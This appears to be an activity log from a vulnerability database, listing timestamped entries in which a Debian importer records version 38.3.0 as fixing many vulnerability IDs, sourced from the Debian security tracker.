2026-04-13T08:13:12.974165+00:00 Debian Importer Fixing VCID-ee5d-s8eb-tbdn https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:13:02.030296+00:00 Debian Importer Fixing VCID-ybyx-4c24-aqb8 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:12:55.950450+00:00 Debian Importer Fixing VCID-x998-fhs5-93ht https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:11:24.947422+00:00 Debian Importer Fixing VCID-s7tx-uu27-xqb5 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:11:03.960735+00:00 Debian Importer Fixing VCID-4az8-8361-7bg2 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:10:26.925189+00:00 Debian Importer Fixing VCID-a4jk-v4s2-r7dy https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:10:16.073145+00:00 Debian Importer Fixing VCID-mwf4-u6v6-zqdu https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:09:48.420455+00:00 Debian Importer Fixing VCID-834e-c7gn-afac https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:08:44.604690+00:00 Debian Importer Fixing VCID-5sxs-wpy9-rqfn https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:08:24.676379+00:00 Debian Importer Fixing VCID-bw4q-dt1r-y3e4 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:08:06.014793+00:00 Debian Importer Fixing VCID-ajsf-6r6w-juey https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:08:04.476200+00:00 Debian Importer Fixing VCID-v7m7-26bu-wfer https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:08:03.659086+00:00 Debian Importer Fixing VCID-fvws-m1ay-aud1 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:07:56.967784+00:00 Debian Importer Fixing VCID-5fc9-tutn-dubw https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:07:56.211315+00:00 Debian Importer Fixing VCID-crpp-9mt6-nbb6 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:07:55.139584+00:00 Debian Importer Fixing VCID-rj9n-ra1t-77dy https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:07:51.623288+00:00 Debian Importer Fixing VCID-qkwb-2fep-gba7 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:07:32.207322+00:00 Debian Importer Fixing VCID-7jvc-54zg-pbcz https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:07:13.702913+00:00 Debian Importer Fixing VCID-bhkh-rppj-1bb5 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:06:27.627095+00:00 Debian Importer Fixing VCID-dr7r-hah7-vfdv https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:05:28.497650+00:00 Debian Importer Fixing VCID-m2q5-rtqv-tudu https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:05:22.346712+00:00 Debian Importer Fixing VCID-u45q-eheh-6kak https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:04:49.608553+00:00 Debian Importer Fixing VCID-vpdn-g1k9-1kdn https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:04:46.804022+00:00 Debian Importer Fixing VCID-dkzb-3u3f-yuee https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:03:55.854723+00:00 Debian Importer Fixing VCID-z3q2-pgdm-wfbz https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:03:06.801311+00:00 Debian Importer Fixing VCID-v24g-h7t5-nbec https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:02:48.760246+00:00 Debian Importer Fixing VCID-6zuv-uh18-k3c1 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:02:19.616499+00:00 Debian Importer Fixing VCID-pp81-c241-rbb5 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:02:11.941257+00:00 Debian Importer Fixing VCID-2gw3-qfan-jygd https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:01:33.005423+00:00 Debian Importer Fixing VCID-9h1k-h8gw-hkat https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:01:31.118773+00:00 Debian Importer Fixing VCID-hgfv-dtsx-hbdx https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:01:05.361287+00:00 Debian Importer Fixing VCID-vkp6-wh22-eqap https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:00:49.574410+00:00 Debian Importer Fixing VCID-4f97-2smu-6qfc https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:00:46.067337+00:00 Debian Importer Fixing VCID-x7us-26aq-3yf8 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T08:00:40.795392+00:00 Debian Importer Fixing VCID-1x5f-2jf7-hbb2 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:59:58.249343+00:00 Debian Importer Fixing VCID-dfzv-wzru-w3gx https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:59:35.972946+00:00 Debian Importer Fixing VCID-rypf-qy6p-3bac https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:59:20.318823+00:00 Debian Importer Fixing VCID-3zbe-p6ue-ffe8 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:58:51.051925+00:00 Debian Importer Fixing VCID-33k9-ygup-9fb3 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:58:48.517926+00:00 Debian Importer Fixing VCID-vv56-v3c7-kfa1 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:58:45.164805+00:00 Debian Importer Fixing VCID-khv9-9he8-ykbf https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:58:10.689572+00:00 Debian Importer Fixing VCID-3pw2-zq6a-2khx https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:56:27.415556+00:00 Debian Importer Fixing VCID-12rd-dhh3-h3ea https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:55:40.509188+00:00 Debian Importer Fixing VCID-uayc-3r68-tudp https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:55:11.375709+00:00 Debian Importer Fixing VCID-pbvz-djcm-67eh https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:54:52.531794+00:00 Debian Importer Fixing VCID-umnw-ksa8-9ua8 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:54:50.959064+00:00 Debian Importer Fixing VCID-8yfc-gunh-17a2 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:54:43.588265+00:00 Debian Importer Fixing VCID-wwxb-6psb-xybx https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:54:33.951492+00:00 Debian Importer Fixing VCID-1gqw-pheb-hfey https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:54:02.422269+00:00 Debian Importer Fixing VCID-mhxv-hu2v-ukeb https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:53:52.636982+00:00 Debian Importer Fixing VCID-5gug-qb5f-rkae https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:53:40.861281+00:00 Debian Importer Fixing VCID-872v-6z75-jucm https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:53:18.773335+00:00 Debian Importer Fixing VCID-38u3-s4ys-bue5 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:52:57.206819+00:00 Debian Importer Fixing VCID-39mw-qs6j-83eu https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:52:34.202653+00:00 Debian Importer Fixing VCID-t75h-4xfn-h7cd https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:52:19.116944+00:00 Debian Importer Fixing VCID-zsxa-yvp8-93fr https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:52:11.044465+00:00 Debian Importer Fixing VCID-y4hn-6bv6-jugw https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:48:18.049689+00:00 Debian Importer Fixing VCID-w1s1-4kv8-5bca https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:47:57.860629+00:00 Debian Importer Fixing VCID-73j4-24p8-pbe5 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:47:55.183069+00:00 Debian Importer Fixing VCID-jz9p-mte7-vfb3 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:47:32.796564+00:00 Debian Importer Fixing VCID-sywj-rqp4-23dd https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:47:27.642296+00:00 Debian Importer Fixing VCID-7bjy-zdas-9yfv https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:47:16.522135+00:00 Debian Importer Fixing VCID-8j37-fwz2-bfea https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:47:01.098481+00:00 Debian Importer Fixing VCID-xaef-x656-fqfq https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:46:25.966335+00:00 Debian Importer Fixing VCID-7f35-ha1p-bbby https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:45:51.479669+00:00 Debian Importer Fixing VCID-aej5-sgf8-7uhp https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:44:47.629774+00:00 Debian Importer Fixing VCID-dqjz-99u6-uyh3 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:43:55.663865+00:00 Debian Importer Fixing VCID-1yte-8nb7-fqaw https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:43:52.881687+00:00 Debian Importer Fixing VCID-n6gp-848w-nbam https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:43:51.847272+00:00 Debian Importer Fixing VCID-ekgu-5zg9-2uaa https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:43:12.278877+00:00 Debian Importer Fixing VCID-wk4h-a1su-wfbh https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:43:05.580680+00:00 Debian Importer Fixing VCID-ryu7-2nsu-kqf6 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:42:46.845419+00:00 Debian Importer Fixing VCID-fq6e-k53f-jugt https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:41:59.784109+00:00 Debian Importer Fixing VCID-hx15-dy4p-uycu https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:41:17.627660+00:00 Debian Importer Fixing VCID-swqu-wape-83bj https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:40:53.152920+00:00 Debian Importer Fixing VCID-hzr4-8x4m-87cy https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:40:40.112025+00:00 Debian Importer Fixing VCID-ptej-pfyn-z3aq https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:40:30.100382+00:00 Debian Importer Fixing VCID-152y-9pjj-p7b7 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:40:25.086617+00:00 Debian Importer Fixing VCID-f1zu-xb4j-8qhp https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:40:01.890914+00:00 Debian Importer Fixing VCID-h6hy-g7da-1yg4 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:39:55.326760+00:00 Debian Importer Fixing VCID-7fmu-6e6q-r7hd https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:39:29.616446+00:00 Debian Importer Fixing VCID-98sh-zs45-hyag https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:39:14.577846+00:00 Debian Importer Fixing VCID-6hay-bjuv-nygd https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:39:09.842272+00:00 Debian Importer Fixing VCID-cuyh-2uau-1yad https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:38:55.169850+00:00 Debian Importer Fixing VCID-477e-a2hz-aqb9 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:38:31.040864+00:00 Debian Importer Fixing VCID-93a6-7956-v3ar https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:38:30.881582+00:00 Debian Importer Fixing VCID-wwam-wq1v-1fec https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:38:16.971539+00:00 Debian Importer Fixing VCID-m9bk-66wv-vqbk https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:37:20.779142+00:00 Debian Importer Fixing VCID-g6mw-mvbu-fbcs https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:37:11.600133+00:00 Debian Importer Fixing VCID-p3vh-b6jn-f3e2 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:37:07.392771+00:00 Debian Importer Fixing VCID-mv9q-facp-yub3 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:35:35.496306+00:00 Debian Importer Fixing VCID-7eeu-wtkq-dyc1 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:35:32.565377+00:00 Debian Importer Fixing VCID-vd3a-e897-8bfn https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:35:20.665425+00:00 Debian Importer Fixing VCID-pnk5-26uq-w3cu https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:34:50.865583+00:00 Debian Importer Fixing VCID-7gya-qyjx-qqfx https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:33:52.460421+00:00 Debian Importer Fixing VCID-zuht-nypg-33fg https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:33:37.712959+00:00 Debian Importer Fixing VCID-6jvf-8pfe-m3cn https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:33:01.343776+00:00 Debian Importer Fixing VCID-q37s-1azj-xkhv https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:32:47.107991+00:00 Debian Importer Fixing VCID-mcef-v74u-pke3 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:32:31.191756+00:00 Debian Importer Fixing VCID-66hm-jwxw-x3hu https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:32:27.934148+00:00 Debian Importer Fixing VCID-4pzm-24uf-73b6 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:32:08.098143+00:00 Debian Importer Fixing VCID-5uyd-bv33-h7g1 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:31:58.116295+00:00 Debian Importer Fixing VCID-zh44-pz7k-abba https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:31:56.019582+00:00 Debian Importer Fixing VCID-7kza-xvmr-sqhe https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:31:39.714287+00:00 Debian Importer Fixing VCID-v1f2-upex-43fm https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:30:58.358916+00:00 Debian Importer Fixing VCID-47zb-362f-n3b8 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:30:55.994751+00:00 Debian Importer Fixing VCID-xy5b-m3h2-hbfj https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:30:42.617655+00:00 Debian Importer Fixing VCID-xzye-g5rw-fyh5 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:30:30.899605+00:00 Debian Importer Fixing VCID-4urn-ywwt-ayeg https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:30:20.529086+00:00 Debian Importer Fixing VCID-a1z8-rynx-p7a8 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:30:02.908915+00:00 Debian Importer Fixing VCID-gp36-v664-vuh2 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:29:45.546102+00:00 Debian Importer Fixing VCID-7jx8-htkz-7qd4 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:29:43.770649+00:00 Debian Importer Fixing VCID-rwnm-ssex-tfgr https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:29:40.314415+00:00 Debian Importer Fixing VCID-vzru-smr4-5kfk https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:29:24.472232+00:00 Debian Importer Fixing VCID-3fzh-1hk1-3ub1 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:29:04.732697+00:00 Debian Importer Fixing VCID-6vvv-g1fm-4bdn https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:28:55.285072+00:00 Debian Importer Fixing VCID-q2zg-jh8m-tua2 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:28:38.824608+00:00 Debian Importer Fixing VCID-2r23-hhkx-9fh6 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:27:47.401970+00:00 Debian Importer Fixing VCID-k6ar-hru3-hygu https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:26:43.336754+00:00 Debian Importer Fixing VCID-knc1-7mhm-vbhn https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:26:26.022003+00:00 Debian Importer Fixing VCID-fnmv-18fv-8kf3 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:26:23.963278+00:00 Debian Importer Fixing VCID-snup-2hn7-sue2 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:26:01.214069+00:00 Debian Importer Fixing VCID-2dgn-j4dn-9fcd https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:25:58.291927+00:00 Debian Importer Fixing VCID-zv8w-puzj-23cd https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:25:54.012485+00:00 Debian Importer Fixing VCID-4kxf-5xrh-uue8 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:24:14.110926+00:00 Debian Importer Fixing VCID-eqr7-q1ga-8kcr https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:24:07.874151+00:00 Debian Importer Fixing VCID-56xz-svu7-eue2 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:24:00.116079+00:00 Debian Importer Fixing VCID-3qad-mewf-8khz https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:23:40.801906+00:00 Debian Importer Fixing VCID-uwbu-vzay-q3ak https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:23:37.057838+00:00 Debian Importer Fixing VCID-93mt-5yvb-zfga https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:23:11.879464+00:00 Debian Importer Fixing VCID-6qqv-wf7w-xfaf https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:22:38.487729+00:00 Debian Importer Fixing VCID-62ar-kwbq-nyh3 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:21:53.388567+00:00 Debian Importer Fixing VCID-punt-nwt4-uqea https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:21:05.044567+00:00 Debian Importer Fixing VCID-8an6-y8xy-pyf3 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:20:58.387489+00:00 Debian Importer Fixing VCID-1daq-9kb7-eudz https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:20:50.038433+00:00 Debian Importer Fixing VCID-jvq6-xjbu-fkb9 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:20:41.948729+00:00 Debian Importer Fixing VCID-nnmr-dnnk-qkc4 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:20:39.402130+00:00 Debian Importer Fixing VCID-pcme-bwan-3bcf https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:19:43.866995+00:00 Debian Importer Fixing VCID-fbta-m4mx-jfap https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:19:25.731950+00:00 Debian Importer Fixing VCID-rwat-s4hf-v7bv https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:19:22.789176+00:00 Debian Importer Fixing VCID-et5y-g25w-4qay https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:18:25.282948+00:00 Debian Importer Fixing VCID-3cn6-jf51-3qdv https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:18:19.160169+00:00 Debian Importer Fixing VCID-9xbc-3nhd-cygp https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:18:17.623990+00:00 Debian Importer Fixing VCID-h221-qd8d-tqa5 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:17:58.803222+00:00 Debian Importer Fixing VCID-x19m-3m6f-4khb https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:17:54.105253+00:00 Debian Importer Fixing VCID-k7ku-8uya-kbeu https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:17:29.178817+00:00 Debian Importer Fixing VCID-v8ma-knpq-wkdv https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:17:17.737354+00:00 Debian Importer Fixing VCID-p84t-bztf-cqdz https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:16:15.737174+00:00 Debian Importer Fixing VCID-5s8n-dfjf-ruey https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:16:13.418089+00:00 Debian Importer Fixing VCID-uwq6-h2du-dkdn https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:15:34.747439+00:00 Debian Importer Fixing VCID-qu7p-k327-6uht https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:15:27.812792+00:00 Debian Importer Fixing VCID-99f6-k1y9-x7ba https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:15:15.626571+00:00 Debian Importer Fixing VCID-jpxf-qevp-kycp https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:14:25.681745+00:00 Debian Importer Fixing VCID-7cbm-nm6u-8kdp https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:14:18.405384+00:00 Debian Importer Fixing VCID-x8j9-exk2-mkez https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:14:13.919761+00:00 Debian Importer Fixing VCID-59yn-uan9-sucn https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:13:29.135493+00:00 Debian Importer Fixing VCID-jcmt-5fes-jug2 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:13:26.831219+00:00 Debian Importer Fixing VCID-65b6-jbxy-gudt https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:13:24.063946+00:00 Debian Importer Fixing VCID-56ad-fjzb-bycr https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:12:58.863560+00:00 Debian Importer Fixing VCID-1y2e-akpf-ufbc https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:12:54.258507+00:00 Debian Importer Fixing VCID-tnnn-bg52-93a9 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:12:26.598885+00:00 Debian Importer Fixing VCID-12j6-qbjn-m3d7 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:11:44.820544+00:00 Debian Importer Fixing VCID-92es-dtbz-tqae https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:11:40.613746+00:00 Debian Importer Fixing VCID-5114-9n17-pkd1 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:09:25.499663+00:00 Debian Importer Fixing VCID-mn7e-8e4j-dqba https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:09:15.006882+00:00 Debian Importer Fixing VCID-txaa-zcha-wbbv https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:09:00.259807+00:00 Debian Importer Fixing VCID-tn11-bwg6-m3e3 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:08:57.975947+00:00 Debian Importer Fixing VCID-b38j-8u7n-47ga https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:08:54.230768+00:00 Debian Importer Fixing VCID-bky2-hjpj-67ag https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:08:49.993029+00:00 Debian Importer Fixing VCID-epd6-xsva-17ea https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:07:45.074948+00:00 Debian Importer Fixing VCID-ep6g-44qy-5qd7 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:07:15.303182+00:00 Debian Importer Fixing VCID-jqv2-v42r-7ybf https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:07:10.597168+00:00 Debian Importer Fixing VCID-1r3u-6afm-23f2 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:06:58.438626+00:00 Debian Importer Fixing VCID-7vrs-x5dn-sbcm https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:06:46.329089+00:00 Debian Importer Fixing VCID-ta5n-gyp1-c3dk https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:06:23.580120+00:00 Debian Importer Fixing VCID-bmhu-4vgv-y7gy https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:06:12.890720+00:00 Debian Importer Fixing VCID-7t1t-1spz-gfee https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:06:00.464695+00:00 Debian Importer Fixing VCID-ny9s-4kcr-tbf4 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:05:43.192534+00:00 Debian Importer Fixing VCID-tms4-1k6m-cqgd https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:05:14.608100+00:00 Debian Importer Fixing VCID-569d-6nue-5kbq https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:05:06.314284+00:00 Debian Importer Fixing VCID-2495-gquz-9bd1 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:04:44.494044+00:00 Debian Importer Fixing VCID-78zg-am5w-gugh https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:04:27.033260+00:00 Debian Importer Fixing VCID-vf3u-cgrx-a7d7 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:03:29.287212+00:00 Debian Importer Fixing VCID-ef36-52cx-dfg5 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:03:25.171072+00:00 Debian Importer Fixing VCID-tv6b-u42h-xkh2 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:02:53.962410+00:00 Debian Importer Fixing VCID-acsa-1uwk-fqee https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:02:30.992617+00:00 Debian Importer Fixing VCID-s6bw-85wn-jygp https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:02:26.261017+00:00 Debian Importer Fixing VCID-nvpf-y2es-3fcz https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:02:26.209693+00:00 Debian Importer Fixing VCID-n7rz-ssve-t7bm https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:02:14.389307+00:00 Debian Importer Fixing VCID-sdw2-cg48-b3fd https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:01:48.102534+00:00 Debian Importer Fixing VCID-zrkc-cfnt-r7hr https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:01:45.353531+00:00 Debian Importer Fixing VCID-eb86-ytt7-j3gf https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:01:15.751051+00:00 Debian Importer Fixing VCID-h6ps-ukb8-qfa9 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:00:16.317447+00:00 Debian Importer Fixing VCID-rxgw-h3br-b7dy https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:00:13.953023+00:00 Debian Importer Fixing VCID-qp4x-w3fe-hyer https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:00:02.984526+00:00 Debian Importer Fixing VCID-1x18-b9sa-yygh https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T07:00:01.238948+00:00 Debian Importer Fixing VCID-1q97-afut-4ffy https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:59:57.360587+00:00 Debian Importer Fixing VCID-fds9-yfxw-gqgs https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:59:55.544001+00:00 Debian Importer Fixing VCID-2m38-vt4m-5ffa https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:59:52.348603+00:00 Debian Importer Fixing VCID-bjr3-shza-a7hc https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:59:37.686044+00:00 Debian Importer Fixing VCID-j8rp-wchj-qfhz https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:58:45.556859+00:00 Debian Importer Fixing VCID-1223-kpm6-2fh6 https://security-tracker.debian.org/tracker/data/json 38.3.0
2026-04-13T06:58:45.195121+00:00 Debian Importer Fixing VCID-7dh9-2g6c-6qhg https://security-tracker.debian.org/tracker/data/json 38.3.0
